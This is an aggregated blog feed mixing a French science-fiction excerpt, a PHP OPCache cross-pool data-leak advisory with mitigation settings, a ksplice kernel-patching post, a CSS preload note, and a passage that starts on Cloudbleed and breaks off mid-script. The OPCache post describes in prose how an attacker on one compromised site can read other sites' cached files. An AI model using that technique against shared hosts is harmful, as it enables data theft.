— Parce que tu es un policier déserteur, tu as été repéré. Mais pour les bases de données civiles, Max et Nellio sont morts. Moi, je n’existe tout simplement pas. Ces deux cas ne rentrent probablement dans aucune des conditions du programme de l’immeuble et, par défaut, il prend le programme automatique du personnel autorisé. C’est une énorme faille de sécurité, le programmeur a du pondre ça avec les pieds mais son bug serait passé inaperçu si deux morts et un non-être ne s’étaient pas pointés.

Je pousse une exclamation de surprise mais je n’ai pas le temps d’aller plus loin que Junior pousse un cri. Il vient de constate que sa main droite, qu’il a bougé en parlant, a également commencé à s’enfoncer. Les doigts sont désormais pris dans le sol. Désespérément il tente de lever le bras gauche et de faire des mouvements pour se dégager. Son corps est désormais enfoncé au delà du plexus solaire. Il se débat laborieusement en poussant des petits cris.

— On ne peut pas rester là sans rien faire à le regarder crever d’une mort horrible ? fais-je en tentant de secouer les bras de Max et Eva.
— Visiblement si, répond laconiquement Max.
— Mais…

Paralysé par l’angoisse, j’observe le niveau du sol engloutir les épaules de mon ami, commencer à monter au niveau du cou. Il penche la tête en arrière dans un ultime espoir de gagner du temps. La pression sur ses poumons doit être énorme, il halète en poussant de petits cris aigus.

— Junior, fais-je. Je… Je… Tu es mon ami !

Le visage est désormais au niveau même du sol, comme un hideux bas-relief. Le smart sand commence à emplir la bouche de Junior dont les yeux reflètent une terreur pure, brute. Une terreur abjectes qui me figent et arrêtent les battements de mon cœur.

Le souffle coupé, je reste immobile, paralysé, les yeux rivés sur un sol propre et lisse.

 

Photo par Frans de Wit.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

The post Mitigating PHP’s long standing issue with OPCache leaking sensitive data appeared first on ma.ttias.be.

A very old security vulnerability has been fixed in PHP regarding the way it handles its OPCaches in environments where a single master process shares multiple PHP-FPM pools. This is the most common way to run PHP nowadays and might affect you, too.

The vulnerability

PHP has a method to speed up the dynamic nature of its interpreter, called bytecode caching. PHP gets interpreted on every pageload, meaning the PHP gets translated to bytecode which the server understands and can execute. Since most PHP pages don't change every second, PHP caches that bytecode in memory and can serve that as the response instead of having to compile (or "interpret") the PHP scripts every time.

In a default PHP-FPM setup, the process tree looks like this.

php-fpm: master process (/etc/php-fpm.conf)
\_ php-fpm: pool site1 (uid: 701)
\_ php-fpm: pool site2 (uid: 702)
\_ php-fpm: pool site3 (uid: 703)

There is a single PHP-FPM master process that gets started as the root user. It then spawns additional FPM pools, that can each run as their own user, to serve websites. The PHP OPCache (that bytecode cache) is held in the master process.

So here's the problem: PHP does not validate the userid when it fetches a script from memory, stored in its bytecode. The concept of a "shared memory" in PHP means everything is stored in the same memory segment, and including a file just checks if a version already exists in bytecode.

If a version of the script exists in bytecode, it's served without additional check.

If a version of the script does not exist in bytecode, the FPM pool (running as an unprivileged uid) will try to read it from disk, and Linux will prevent reads from files that the process has no access to. You know, like it's supposed to happen.

This is the one of the primary reasons I've advocated running multiple masters instead of multiple pools for years.

The solution: upgrade PHP & set additional configurations

After a way too long period, this bug is now resolved and you can fix it with additional master configurations.

$ cat /etc/php-fpm.conf
...
opcache.validate_permission (default "0")
       Leads OPcache to check file readability on each access to cached file.
       This directive should be enabled in shared hosting environment, when few
       users (PHP-FPM pools) reuse the common OPcache shared memory.

opcache.validate_root (default "0")
       This directive prevents file name collisions in different "chroot"
       environments. It should be enabled for sites that may serve requests in
       different "chroot" environments.

The introduction of the opcache.validate_permission and opcache.validate_root means you can now force PHP's OPCache to also check the permissions of the file and force a validation of the root path of the file, to avoid chrooted environments from reading eachothers' files (more on that in the original bugreport).

The default values, however, are insecure.

I understand why they are like this, to keep compatibility with previous versions and avoid breaking changes in minor versions, but you have to explicitly enable them to prevent this behaviour.

Minimum versions: PHP 5.6.29, 7.0.14, 7.1.0

This fix didn't get much attention and I only noticed it after someone posted to the oss-security mailing list. To mitigate this properly, you'll need at least;

Anything lower than 5.6 is already end of life and won't get this fix, even though OPCache got introduced in PHP 5.5. You'll need a recent 5.6 or newer to mitigate this.

If you still run PHP 5.5 (which many do) and want to be safe, your best bet is to either run multiple PHP masters (a single master per pool) or disable OPCache entirely.

Indirect local privilege escalation to root

This has been a long standing issue with PHP that's actually more serious than it looks at first glance.

If you manage to compromise a single website (which for most CMS's in PHP that don't get updated, isn't very hard), this shared memory allows you access to all other websites, if their pages have been cached in the OPCache.

You can effectively use this shared memory buffer as a passage way to read other website's PHP files, read their configs, get access to their database and steal all their data. To do so, you usually need root access to a server, but PHP's OPCache gives you a convenient shortcut to accomplish similar things.

All you need is the path to their files, which can either be retrieved via opcache_get_status() (if enabled, which again -- it is by default), or you can guess the paths, which on shared hosting environments usually isn't hard either.

This actually makes this shared memory architecture almost as bad as a local privilege escalation vulnerability, depending on what you want to accomplish. If your goal is to steal data from a server that normally requires root privileges, you got it.

If your goal is to actually get root and run root-only scripts (aka: bind on lower ports etc.), that won't be possible.

The good part is, there's now a fix with the new PHP configurations. The bad news is, you need to update to the latest releases to get it and explicitly enable it.

Additional sources

For your reading pleasure:

The post Mitigating PHP’s long standing issue with OPCache leaking sensitive data appeared first on ma.ttias.be.

I published the following diary on isc.sans.org: “Analysis of a Simple PHP Backdoor“.

With the huge surface attack provided by CMS like Drupal or WordPress, webshells remain a classic attack scenario. A few months ago, I wrote a diary about the power of webshells. A few days ago, a friend of mine asked me some help about an incident he was investigating. A website was compromised (no magic – very bad admin password) and a backdoor was dropped. He sent a copy of the malicious file… [Read more]

[The post [SANS ISC Diary] Analysis of a Simple PHP Backdoor has been first published on /dev/random]

February 24, 2017

As many of you probably know by now, a few days ago there was a report of an old long-standing Linux bug that got fixed. Going back to kernels even down to 2.6.18 and possible earlier. This bug was recently fixed, see here.

Now, distribution vendors, including us, have released kernel updates that customers/users can download and install but as always a regular kernel upgrade requires a reboot. We have had ksplice as a service for Oracle Linux support customers for quite a few years now and we also support Ubuntu and Fedora for free for anyone (see here).

One thing that is not often talked about but, I believe is very powerful and I wanted to point out here, is the following:

Typically the distribution vendors (including us) will release an update kernel that's the 'latest' version with these CVEs fixed, but many customers run older versions of both the distribution and kernels. We now see some other vendors trying to provide the basics for some online patching but by and far it's based on one-offs and for specific kernels. A big part of the ksplice service is the backend infrastructure to easily build updates for literally a few 1000 kernels. This gives customers great flexibility. You can be on one of many dot-releases of the OS and you can use ksplice. Here is a list of example kernel versions for Oracle Linux that you could be running today and we provide updates for with ksplice,for ,for instance, this DCCP bug. That's a big difference with what other folks have been trying to mimic now that online patching has become more and more important for availability.

Here is an example kernel 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 08:34:17 PDT 2015 So that's a kernel built back in September of 2015, a random 'dot release' I run on one of my machines, and there's a ksplice patch available for these recent CVEs. I don't have to worry about having to install the 'latest' kernel, nor doing a reboot.

# uptrack-upgrade 
The following steps will be taken:
Install [f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
Install [5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.

Go ahead [y/N]? y
Installing [f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
Installing [5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.
Your kernel is fully up to date.
Effective kernel version is 2.6.32-642.15.1.el6

and done. That easy. My old 2.6.32-573.7.1 kernel looks like 2.6.32-642.15.1 in terms of critical fixes and CVEs.

# uptrack-show
Installed updates:
[cct5dnbf] Clear garbage data on the kernel stack when handling signals.
[ektd95cj] Reduce usage of reserved percpu memory.
[uuhgbl3e] Remote denial-of-service in Brocade Ethernet driver.
[kg3f16ii] CVE-2015-7872: Denial-of-service when garbage collecting uninstantiated keyring.
[36ng2h1l] CVE-2015-7613: Privilege escalation in IPC object initialization.
[33jwvtbb] CVE-2015-5307: KVM host denial-of-service in alignment check.
[38gzh9gl] CVE-2015-8104: KVM host denial-of-service in debug exception.
[6wvrdj93] CVE-2015-2925: Privilege escalation in bind mounts inside namespaces.
[1l4i9dfh] CVE-2016-0774: Information leak in the pipe system call on failed atomic read.
[xu4auj49] CVE-2015-5157: Disable modification of LDT by userspace processes.
[554ck5nl] CVE-2015-8767: Denial-of-service in SCTP heartbeat timeout.
[adgeye5p] CVE-2015-8543: Denial-of-service on out of range protocol for raw sockets.
[5ojkw9lv] CVE-2015-7550: Denial-of-service when reading and revoking a key concurrently.
[gfr93o7j] CVE-2015-8324: NULL pointer dereference in ext4 on mount error.
[ft01zrkg] CVE-2013-2015, CVE-2015-7509: Possible privilege escalation when mounting an non-journaled ext4 filesystem.
[87lw5yyy] CVE-2015-8215: Remote denial-of-service of network traffic when changing the MTU.
[2bby9cuy] CVE-2010-5313, CVE-2014-7842: Denial of service in KVM L1 guest from L2 guest.
[orjsp65y] CVE-2015-5156: Denial-of-service in Virtio network device.
[5j4hp0ot] Device Mapper logic error when reloading the block multi-queue.
[a1e5kxp6] CVE-2016-4565: Privilege escalation in Infiniband ioctl.
[gfpg64bh] CVE-2016-5696: Session hijacking in TCP connections.
[b4ljcwin] Message corruption in pseudo terminal output.
[prijjgt5] CVE-2016-4470: Denial-of-service in the keyring subsystem.
[4y2f30ch] CVE-2016-5829: Memory corruption in unknown USB HID devices.
[j1mivn4f] Denial-of-service when resetting a Fibre Channel over Ethernet interface.
[nawv8jdu] CVE-2016-5195: Privilege escalation when handling private mapping copy-on-write.
[97fe0h7s] CVE-2016-1583: Privilege escalation in eCryptfs.
[fdztfgcv] Denial-of-service when sending a TCP reset from the netfilter.
[gm4ldjjf] CVE-2016-6828: Use after free during TCP transmission.
[s8pymcf8] CVE-2016-7117: Denial-of-service in recvmmsg() error handling.
[1ktf7029] CVE-2016-4997, CVE-2016-4998: Privilege escalation in the Netfilter driver.
[f4muxalm] CVE-2017-6074: Denial-of-service when using IPV6_RECVPKTINFO socket option.
[5ncctcgz] CVE-2016-9555: Remote denial-of-service due to SCTP state machine memory corruption.

Effective kernel version is 2.6.32-642.15.1.el6

Here is the list of kernels we build modules for as part of Oracle Linux customers kernel choices:

oracle-2.6.18-238.0.0.0.1.el5
oracle-2.6.18-238.1.1.0.1.el5
oracle-2.6.18-238.5.1.0.1.el5
oracle-2.6.18-238.9.1.0.1.el5
oracle-2.6.18-238.12.1.0.1.el5
oracle-2.6.18-238.19.1.0.1.el5
oracle-2.6.18-274.0.0.0.1.el5
oracle-2.6.18-274.3.1.0.1.el5
oracle-2.6.18-274.7.1.0.1.el5
oracle-2.6.18-274.12.1.0.1.el5
oracle-2.6.18-274.17.1.0.1.el5
oracle-2.6.18-274.18.1.0.1.el5
oracle-2.6.18-308.0.0.0.1.el5
oracle-2.6.18-308.1.1.0.1.el5
oracle-2.6.18-308.4.1.0.1.el5
oracle-2.6.18-308.8.1.0.1.el5
oracle-2.6.18-308.8.2.0.1.el5
oracle-2.6.18-308.11.1.0.1.el5
oracle-2.6.18-308.13.1.0.1.el5
oracle-2.6.18-308.16.1.0.1.el5
oracle-2.6.18-308.20.1.0.1.el5
oracle-2.6.18-308.24.1.0.1.el5
oracle-2.6.18-348.0.0.0.1.el5
oracle-2.6.18-348.1.1.0.1.el5
oracle-2.6.18-348.2.1.0.1.el5
oracle-2.6.18-348.3.1.0.1.el5
oracle-2.6.18-348.4.1.0.1.el5
oracle-2.6.18-348.6.1.0.1.el5
oracle-2.6.18-348.12.1.0.1.el5
oracle-2.6.18-348.16.1.0.1.el5
oracle-2.6.18-348.18.1.0.1.el5
oracle-2.6.18-371.0.0.0.1.el5
oracle-2.6.18-371.1.2.0.1.el5
oracle-2.6.18-371.3.1.0.1.el5
oracle-2.6.18-371.4.1.0.1.el5
oracle-2.6.18-371.6.1.0.1.el5
oracle-2.6.18-371.8.1.0.1.el5
oracle-2.6.18-371.9.1.0.1.el5
oracle-2.6.18-371.11.1.0.1.el5
oracle-2.6.18-371.12.1.0.1.el5
oracle-2.6.18-398.0.0.0.1.el5
oracle-2.6.18-400.0.0.0.1.el5
oracle-2.6.18-400.1.1.0.1.el5
oracle-2.6.18-402.0.0.0.1.el5
oracle-2.6.18-404.0.0.0.1.el5
oracle-2.6.18-406.0.0.0.1.el5
oracle-2.6.18-407.0.0.0.1.el5
oracle-2.6.18-408.0.0.0.1.el5
oracle-2.6.18-409.0.0.0.1.el5
oracle-2.6.18-410.0.0.0.1.el5
oracle-2.6.18-411.0.0.0.1.el5
oracle-2.6.18-412.0.0.0.1.el5
oracle-2.6.18-416.0.0.0.1.el5
oracle-2.6.18-417.0.0.0.1.el5
oracle-2.6.18-418.0.0.0.1.el5
oracle-2.6.32-642.0.0.0.1.el6
oracle-3.10.0-514.6.1.0.1.el7
oracle-3.10.0-514.6.2.0.1.el7
oracle-uek-2.6.39-100.5.1
oracle-uek-2.6.39-100.6.1
oracle-uek-2.6.39-100.7.1
oracle-uek-2.6.39-100.10.1
oracle-uek-2.6.39-200.24.1
oracle-uek-2.6.39-200.29.1
oracle-uek-2.6.39-200.29.2
oracle-uek-2.6.39-200.29.3
oracle-uek-2.6.39-200.31.1
oracle-uek-2.6.39-200.32.1
oracle-uek-2.6.39-200.33.1
oracle-uek-2.6.39-200.34.1
oracle-uek-2.6.39-300.17.1
oracle-uek-2.6.39-300.17.2
oracle-uek-2.6.39-300.17.3
oracle-uek-2.6.39-300.26.1
oracle-uek-2.6.39-300.28.1
oracle-uek-2.6.39-300.32.4
oracle-uek-2.6.39-400.17.1
oracle-uek-2.6.39-400.17.2
oracle-uek-2.6.39-400.21.1
oracle-uek-2.6.39-400.21.2
oracle-uek-2.6.39-400.23.1
oracle-uek-2.6.39-400.24.1
oracle-uek-2.6.39-400.109.1
oracle-uek-2.6.39-400.109.3
oracle-uek-2.6.39-400.109.4
oracle-uek-2.6.39-400.109.5
oracle-uek-2.6.39-400.109.6
oracle-uek-2.6.39-400.209.1
oracle-uek-2.6.39-400.209.2
oracle-uek-2.6.39-400.210.2
oracle-uek-2.6.39-400.211.1
oracle-uek-2.6.39-400.211.2
oracle-uek-2.6.39-400.211.3
oracle-uek-2.6.39-400.212.1
oracle-uek-2.6.39-400.214.1
oracle-uek-2.6.39-400.214.3
oracle-uek-2.6.39-400.214.4
oracle-uek-2.6.39-400.214.5
oracle-uek-2.6.39-400.214.6
oracle-uek-2.6.39-400.215.1
oracle-uek-2.6.39-400.215.2
oracle-uek-2.6.39-400.215.3
oracle-uek-2.6.39-400.215.4
oracle-uek-2.6.39-400.215.6
oracle-uek-2.6.39-400.215.7
oracle-uek-2.6.39-400.215.10
oracle-uek-2.6.39-400.215.11
oracle-uek-2.6.39-400.215.12
oracle-uek-2.6.39-400.215.13
oracle-uek-2.6.39-400.215.14
oracle-uek-2.6.39-400.215.15
oracle-uek-2.6.39-400.243.1
oracle-uek-2.6.39-400.245.1
oracle-uek-2.6.39-400.246.2
oracle-uek-2.6.39-400.247.1
oracle-uek-2.6.39-400.248.3
oracle-uek-2.6.39-400.249.1
oracle-uek-2.6.39-400.249.3
oracle-uek-2.6.39-400.249.4
oracle-uek-2.6.39-400.250.2
oracle-uek-2.6.39-400.250.4
oracle-uek-2.6.39-400.250.5
oracle-uek-2.6.39-400.250.6
oracle-uek-2.6.39-400.250.7
oracle-uek-2.6.39-400.250.9
oracle-uek-2.6.39-400.250.10
oracle-uek-2.6.39-400.250.11
oracle-uek-2.6.39-400.264.1
oracle-uek-2.6.39-400.264.4
oracle-uek-2.6.39-400.264.5
oracle-uek-2.6.39-400.264.6
oracle-uek-2.6.39-400.264.13
oracle-uek-2.6.39-400.276.1
oracle-uek-2.6.39-400.277.1
oracle-uek-2.6.39-400.278.1
oracle-uek-2.6.39-400.278.2
oracle-uek-2.6.39-400.278.3
oracle-uek-2.6.39-400.280.1
oracle-uek-2.6.39-400.281.1
oracle-uek-2.6.39-400.282.1
oracle-uek-2.6.39-400.283.1
oracle-uek-2.6.39-400.283.2
oracle-uek-2.6.39-400.284.1
oracle-uek-2.6.39-400.284.2
oracle-uek-2.6.39-400.286.2
oracle-uek-2.6.39-400.286.3
oracle-uek-2.6.39-400.290.1
oracle-uek-2.6.39-400.290.2
oracle-uek-2.6.39-400.293.1
oracle-uek-2.6.39-400.293.2
oracle-uek-2.6.39-400.294.1
oracle-uek-2.6.39-400.294.2
oracle-uek-2.6.39-400.128.21
oracle-uek-3.8.13-16
oracle-uek-3.8.13-16.1.1
oracle-uek-3.8.13-16.2.1
oracle-uek-3.8.13-16.2.2
oracle-uek-3.8.13-16.2.3
oracle-uek-3.8.13-16.3.1
oracle-uek-3.8.13-26
oracle-uek-3.8.13-26.1.1
oracle-uek-3.8.13-26.2.1
oracle-uek-3.8.13-26.2.2
oracle-uek-3.8.13-26.2.3
oracle-uek-3.8.13-26.2.4
oracle-uek-3.8.13-35
oracle-uek-3.8.13-35.1.1
oracle-uek-3.8.13-35.1.2
oracle-uek-3.8.13-35.1.3
oracle-uek-3.8.13-35.3.1
oracle-uek-3.8.13-35.3.2
oracle-uek-3.8.13-35.3.3
oracle-uek-3.8.13-35.3.4
oracle-uek-3.8.13-35.3.5
oracle-uek-3.8.13-44
oracle-uek-3.8.13-44.1.1
oracle-uek-3.8.13-44.1.3
oracle-uek-3.8.13-44.1.4
oracle-uek-3.8.13-44.1.5
oracle-uek-3.8.13-55
oracle-uek-3.8.13-55.1.1
oracle-uek-3.8.13-55.1.2
oracle-uek-3.8.13-55.1.5
oracle-uek-3.8.13-55.1.6
oracle-uek-3.8.13-55.1.8
oracle-uek-3.8.13-55.2.1
oracle-uek-3.8.13-68
oracle-uek-3.8.13-68.1.2
oracle-uek-3.8.13-68.1.3
oracle-uek-3.8.13-68.2.2
oracle-uek-3.8.13-68.2.2.1
oracle-uek-3.8.13-68.2.2.2
oracle-uek-3.8.13-68.3.1
oracle-uek-3.8.13-68.3.2
oracle-uek-3.8.13-68.3.3
oracle-uek-3.8.13-68.3.4
oracle-uek-3.8.13-68.3.5
oracle-uek-3.8.13-98
oracle-uek-3.8.13-98.1.1
oracle-uek-3.8.13-98.1.2
oracle-uek-3.8.13-98.2.1
oracle-uek-3.8.13-98.2.2
oracle-uek-3.8.13-98.4.1
oracle-uek-3.8.13-98.5.2
oracle-uek-3.8.13-98.6.1
oracle-uek-3.8.13-98.7.1
oracle-uek-3.8.13-98.8.1
oracle-uek-3.8.13-118
oracle-uek-3.8.13-118.2.1
oracle-uek-3.8.13-118.2.2
oracle-uek-3.8.13-118.2.4
oracle-uek-3.8.13-118.2.5
oracle-uek-3.8.13-118.3.1
oracle-uek-3.8.13-118.3.2
oracle-uek-3.8.13-118.4.1
oracle-uek-3.8.13-118.4.2
oracle-uek-3.8.13-118.6.1
oracle-uek-3.8.13-118.6.2
oracle-uek-3.8.13-118.7.1
oracle-uek-3.8.13-118.8.1
oracle-uek-3.8.13-118.9.1
oracle-uek-3.8.13-118.9.2
oracle-uek-3.8.13-118.10.2
oracle-uek-3.8.13-118.11.2
oracle-uek-3.8.13-118.13.2
oracle-uek-3.8.13-118.13.3
oracle-uek-3.8.13-118.14.1
oracle-uek-3.8.13-118.14.2
oracle-uek-3.8.13-118.15.1
oracle-uek-3.8.13-118.15.2
oracle-uek-3.8.13-118.15.3
oracle-uek-3.8.13-118.16.2
oracle-uek-3.8.13-118.16.3
oracle-uek-4.1.12-32
oracle-uek-4.1.12-32.1.2
oracle-uek-4.1.12-32.1.3
oracle-uek-4.1.12-32.2.1
oracle-uek-4.1.12-32.2.3
oracle-uek-4.1.12-37.2.1
oracle-uek-4.1.12-37.2.2
oracle-uek-4.1.12-37.3.1
oracle-uek-4.1.12-37.4.1
oracle-uek-4.1.12-37.5.1
oracle-uek-4.1.12-37.6.1
oracle-uek-4.1.12-37.6.2
oracle-uek-4.1.12-37.6.3
oracle-uek-4.1.12-61.1.6
oracle-uek-4.1.12-61.1.9
oracle-uek-4.1.12-61.1.10
oracle-uek-4.1.12-61.1.13
oracle-uek-4.1.12-61.1.14
oracle-uek-4.1.12-61.1.16
oracle-uek-4.1.12-61.1.17
oracle-uek-4.1.12-61.1.18
oracle-uek-4.1.12-61.1.19
oracle-uek-4.1.12-61.1.21
oracle-uek-4.1.12-61.1.22
oracle-uek-4.1.12-61.1.23
oracle-uek-4.1.12-61.1.24
oracle-uek-4.1.12-61.1.25
oracle-uek-4.1.12-61.1.27
rhel-2.6.32-71.el6
rhel-2.6.32-71.7.1.el6
rhel-2.6.32-71.14.1.el6
rhel-2.6.32-71.18.1.el6
rhel-2.6.32-71.18.2.el6
rhel-2.6.32-71.24.1.el6
rhel-2.6.32-71.29.1.el6
rhel-2.6.32-131.0.15.el6
rhel-2.6.32-131.2.1.el6
rhel-2.6.32-131.4.1.el6
rhel-2.6.32-131.6.1.el6
rhel-2.6.32-131.12.1.el6
rhel-2.6.32-131.17.1.el6
rhel-2.6.32-131.21.1.el6
rhel-2.6.32-220.el6
rhel-2.6.32-220.2.1.el6
rhel-2.6.32-220.4.1.el6
rhel-2.6.32-220.4.2.el6
rhel-2.6.32-220.7.1.el6
rhel-2.6.32-220.13.1.el6
rhel-2.6.32-220.17.1.el6
rhel-2.6.32-220.23.1.el6
rhel-2.6.32-279.el6
rhel-2.6.32-279.1.1.el6
rhel-2.6.32-279.2.1.el6
rhel-2.6.32-279.5.1.el6
rhel-2.6.32-279.5.2.el6
rhel-2.6.32-279.9.1.el6
rhel-2.6.32-279.11.1.el6
rhel-2.6.32-279.14.1.el6
rhel-2.6.32-279.19.1.el6
rhel-2.6.32-279.22.1.el6
rhel-2.6.32-358.el6
rhel-2.6.32-358.0.1.el6
rhel-2.6.32-358.2.1.el6
rhel-2.6.32-358.6.1.el6
rhel-2.6.32-358.6.2.el6
rhel-2.6.32-358.6.2.el6.x86_64.crt1
rhel-2.6.32-358.11.1.el6
rhel-2.6.32-358.14.1.el6
rhel-2.6.32-358.18.1.el6
rhel-2.6.32-358.23.2.el6
rhel-2.6.32-431.el6
rhel-2.6.32-431.1.2.el6
rhel-2.6.32-431.3.1.el6
rhel-2.6.32-431.5.1.el6
rhel-2.6.32-431.11.2.el6
rhel-2.6.32-431.17.1.el6
rhel-2.6.32-431.20.3.el6
rhel-2.6.32-431.20.5.el6
rhel-2.6.32-431.23.3.el6
rhel-2.6.32-431.29.2.el6
rhel-2.6.32-504.el6
rhel-2.6.32-504.1.3.el6
rhel-2.6.32-504.3.3.el6
rhel-2.6.32-504.8.1.el6
rhel-2.6.32-504.12.2.el6
rhel-2.6.32-504.16.2.el6
rhel-2.6.32-504.23.4.el6
rhel-2.6.32-504.30.3.el6
rhel-2.6.32-573.el6
rhel-2.6.32-573.1.1.el6
rhel-2.6.32-573.3.1.el6
rhel-2.6.32-573.7.1.el6
rhel-2.6.32-573.8.1.el6
rhel-2.6.32-573.12.1.el6
rhel-2.6.32-573.18.1.el6
rhel-2.6.32-573.22.1.el6
rhel-2.6.32-573.26.1.el6
rhel-2.6.32-642.el6
rhel-2.6.32-642.1.1.el6
rhel-2.6.32-642.3.1.el6
rhel-2.6.32-642.4.2.el6
rhel-2.6.32-642.6.1.el6
rhel-2.6.32-642.6.2.el6
rhel-2.6.32-642.11.1.el6
rhel-2.6.32-642.13.1.el6
rhel-2.6.32-642.13.2.el6
rhel-3.10.0-123.el7
rhel-3.10.0-123.1.2.el7
rhel-3.10.0-123.4.2.el7
rhel-3.10.0-123.4.4.el7
rhel-3.10.0-123.6.3.el7
rhel-3.10.0-123.8.1.el7
rhel-3.10.0-123.9.2.el7
rhel-3.10.0-123.9.3.el7
rhel-3.10.0-123.13.1.el7
rhel-3.10.0-123.13.2.el7
rhel-3.10.0-123.20.1.el7
rhel-3.10.0-229.el7
rhel-3.10.0-229.1.2.el7
rhel-3.10.0-229.4.2.el7
rhel-3.10.0-229.7.2.el7
rhel-3.10.0-229.11.1.el7
rhel-3.10.0-229.14.1.el7
rhel-3.10.0-229.20.1.el6.x86_64.knl2
rhel-3.10.0-229.20.1.el7
rhel-3.10.0-327.el7
rhel-3.10.0-327.3.1.el7
rhel-3.10.0-327.4.4.el7
rhel-3.10.0-327.4.5.el7
rhel-3.10.0-327.10.1.el7
rhel-3.10.0-327.13.1.el7
rhel-3.10.0-327.18.2.el7
rhel-3.10.0-327.22.2.el7
rhel-3.10.0-327.28.2.el7
rhel-3.10.0-327.28.3.el7
rhel-3.10.0-327.36.1.el7
rhel-3.10.0-327.36.2.el7
rhel-3.10.0-327.36.3.el7
rhel-3.10.0-514.el7
rhel-3.10.0-514.2.2.el7
rhel-3.10.0-514.6.1.el7
rhel-3.10.0-514.6.2.el7
rhel-2.6.18-92.1.10.el5
rhel-2.6.18-92.1.13.el5
rhel-2.6.18-92.1.17.el5
rhel-2.6.18-92.1.18.el5
rhel-2.6.18-92.1.22.el5
rhel-2.6.18-128.el5
rhel-2.6.18-128.1.1.el5
rhel-2.6.18-128.1.6.el5
rhel-2.6.18-128.1.10.el5
rhel-2.6.18-128.1.14.el5
rhel-2.6.18-128.1.16.el5
rhel-2.6.18-128.2.1.el5
rhel-2.6.18-128.4.1.el5
rhel-2.6.18-128.7.1.el5
rhel-2.6.18-149.el5
rhel-2.6.18-164.el5
rhel-2.6.18-164.2.1.el5
rhel-2.6.18-164.6.1.el5
rhel-2.6.18-164.9.1.el5
rhel-2.6.18-164.10.1.el5
rhel-2.6.18-164.11.1.el5
rhel-2.6.18-164.15.1.el5
rhel-2.6.18-194.el5
rhel-2.6.18-194.3.1.el5
rhel-2.6.18-194.8.1.el5
rhel-2.6.18-194.11.1.el5
rhel-2.6.18-194.11.3.el5
rhel-2.6.18-194.11.4.el5
rhel-2.6.18-194.17.1.el5
rhel-2.6.18-194.17.4.el5
rhel-2.6.18-194.26.1.el5
rhel-2.6.18-194.32.1.el5
rhel-2.6.18-238.el5
rhel-2.6.18-238.1.1.el5
rhel-2.6.18-238.5.1.el5
rhel-2.6.18-238.9.1.el5
rhel-2.6.18-238.12.1.el5
rhel-2.6.18-238.19.1.el5
rhel-2.6.18-274.el5
rhel-2.6.18-274.3.1.el5
rhel-2.6.18-274.7.1.el5
rhel-2.6.18-274.12.1.el5
rhel-2.6.18-274.17.1.el5
rhel-2.6.18-274.18.1.el5
rhel-2.6.18-308.el5
rhel-2.6.18-308.1.1.el5
rhel-2.6.18-308.4.1.el5
rhel-2.6.18-308.8.1.el5
rhel-2.6.18-308.8.2.el5
rhel-2.6.18-308.11.1.el5
rhel-2.6.18-308.13.1.el5
rhel-2.6.18-308.16.1.el5
rhel-2.6.18-308.20.1.el5
rhel-2.6.18-308.24.1.el5
rhel-2.6.18-348.el5
rhel-2.6.18-348.1.1.el5
rhel-2.6.18-348.2.1.el5
rhel-2.6.18-348.3.1.el5
rhel-2.6.18-348.4.1.el5
rhel-2.6.18-348.6.1.el5
rhel-2.6.18-348.12.1.el5
rhel-2.6.18-348.16.1.el5
rhel-2.6.18-348.18.1.el5
rhel-2.6.18-371.el5
rhel-2.6.18-371.1.2.el5
rhel-2.6.18-371.3.1.el5
rhel-2.6.18-371.4.1.el5
rhel-2.6.18-371.6.1.el5
rhel-2.6.18-371.8.1.el5
rhel-2.6.18-371.9.1.el5
rhel-2.6.18-371.11.1.el5
rhel-2.6.18-371.12.1.el5
rhel-2.6.18-398.el5
rhel-2.6.18-400.el5
rhel-2.6.18-400.1.1.el5
rhel-2.6.18-402.el5
rhel-2.6.18-404.el5
rhel-2.6.18-406.el5
rhel-2.6.18-407.el5
rhel-2.6.18-408.el5
rhel-2.6.18-409.el5
rhel-2.6.18-410.el5
rhel-2.6.18-411.el5
rhel-2.6.18-412.el5
rhel-2.6.18-416.el5
rhel-2.6.18-417.el5
rhel-2.6.18-418.el5

compare that to kpatch or kgraft or so.

Historically Autoptimize used its own JS-implementation to defer the loading of the main CSS, hooking into the domContentLoaded event and this has worked fine. I knew about Filament Group’s loadCSS, but saw no urgent reason to implement it as I saw no big advantages vs. my homegrown solution. That changed when criticalcss.com’s Jonas contacted me, pointing out that the best way to load CSS is now using the rel="preload" approach, which as of loadCSS 1.3 is also the way loadCSS works;

<link rel="preload" href="path/to/mystylesheet.css" as="style" onload="this.rel='stylesheet'">

As rel="preload" currently is only supported by Chrome & Opera (both Blink-based), a JS polyfill is needed for other browsers which uses loadCSS to load the CSS. Hopefully other browsers catch up on rel="preload" because it is a very elegant solution which allows the CSS to load sooner then with the old code while still being non-render blocking. What more could one which for (“Unicorns” my 10yo daughter might say, but what does she know)?

Anyways; I have integrated this new approach in a separate branch on GitHub, you can download the zip-file here to test this and all the other fixes and improvements since 2.1.0. Let me know what you think. Happy preloading!

Yesterday, Cloudflare posted an incident report on their blog about an issue discovered in their HTML parser. A very nice report which is worth a read! As usual, in our cyber world, this vulnerability quickly received a nice name and logo: “Cloudbleed“. I’ll not explain in details the vulnerability here, there are already multiple reviews of this incident.

According to Cloudflare, the impact is the following:

This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens).

A lot of interesting data could be disclosed so my biggest concern was: “Am I affected by Cloudbleed?” Cloudflare being a key player on the Internet, chances to visit websites protected by their services are very high. How to make an inventory of those websites? The idea is to use Splunk to achieve this: If your DNS resolvers logs are indexed by Splunk, you can use a lookup table to search for IP addresses belonging to Cloudflare.

Cloudflare is transparent and publicly announces the IP subnets they use (both IPv4 & IPv6). By default, Splunk does not perform lookups in CIDR directly. I created the complete list of IP addresses with a few lines of Python:

#!/usr/bin/python
# IP Sources:
# https://www.cloudflare.com/ips/
from netaddr import IPNetwork
cidrs = [
  '103.21.244.0/22', '103.22.200.0/22', '103.31.4.0/22', '104.16.0.0/12',
